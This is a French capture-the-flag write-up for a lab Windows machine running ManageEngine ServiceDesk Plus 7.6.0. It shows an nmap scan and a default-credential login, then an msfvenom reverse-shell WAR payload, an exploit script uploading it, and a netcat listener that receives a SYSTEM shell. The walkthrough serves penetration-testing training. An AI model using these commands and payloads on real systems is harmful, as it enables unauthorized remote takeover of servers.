# Helpdesk `ManageEngine` * Nom machine : Helpdesk * Difficulté : Facile * OS : Windows ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 03:57 EDT Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 76.42% done; ETC: 03:59 (0:00:29 remaining) Nmap scan report for 192.168.212.43 Host is up (0.033s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ms-wbt-server Microsoft Terminal Service 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-cookie-flags: | /: | JSESSIONID: |_ httponly flag not set |_http-server-header: Apache-Coyote/1.1 |_http-title: ManageEngine ServiceDesk Plus Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2 Host script results: | smb2-time: | date: 2024-07-24T07:59:57 |_ start_date: 2024-07-24T07:57:00 | smb-os-discovery: | OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: HELPDESK | NetBIOS computer name: HELPDESK\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-07-24T00:59:57-07:00 | smb2-security-mode: | 2:0:2: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: HELPDESK, NetBIOS user: , NetBIOS MAC: 00:50:56:9e:f3:30 (VMware) |_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 165.53 seconds ``` ### HTTP (8080) : Apache Tomcat/Coyote JSP engine 1.1

ManageEngine ServiceDesk Plus | 7.6.0 Une recherche google nous permet de trouver des identifiants par défauts. administrator:administrator fonctionne.

Nous allons chercher un exploit correspondant à cette version de ManageEngine : {% embed url="" %} ## Accès initial ### ManageEngine Exploit Nous allons copier l'exploit sur le repo précédent, créer un reverse shell .war et exécuter l'exploit. ``` ┌──(kali㉿kali)-[~] └─$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.217 LPORT=4444 -f war > shell.war Payload size: 12808 bytes Final size of war file: 12808 bytes ``` ``` ┌──(kali㉿kali)-[~] └─$ python exploit.py 192.168.212.43 8080 administrator administrator shell.war /home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version! warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported " Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/gPIquvKX8AFoGmtp Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/uDfRC1k6eYAREORM Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/EO5c4l6t6Z2NlwfX ``` Lancer avant exploit : ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [192.168.45.217] from (UNKNOWN) [192.168.212.43] 49182 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\ManageEngine\ServiceDesk\bin>whoami whoami nt authority\system C:\ManageEngine\ServiceDesk\bin>cd /users/administrator/desktop C:\Users\Administrator\Desktop>type proof.txt ``` Nous sommes directement nt authority\system !